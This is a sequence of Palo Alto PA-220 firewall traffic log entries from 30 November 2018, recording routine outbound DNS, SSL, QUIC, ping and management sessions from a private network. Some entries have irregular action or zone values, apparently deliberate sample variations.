16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 
16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 
1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:29,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 
16:09:34,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
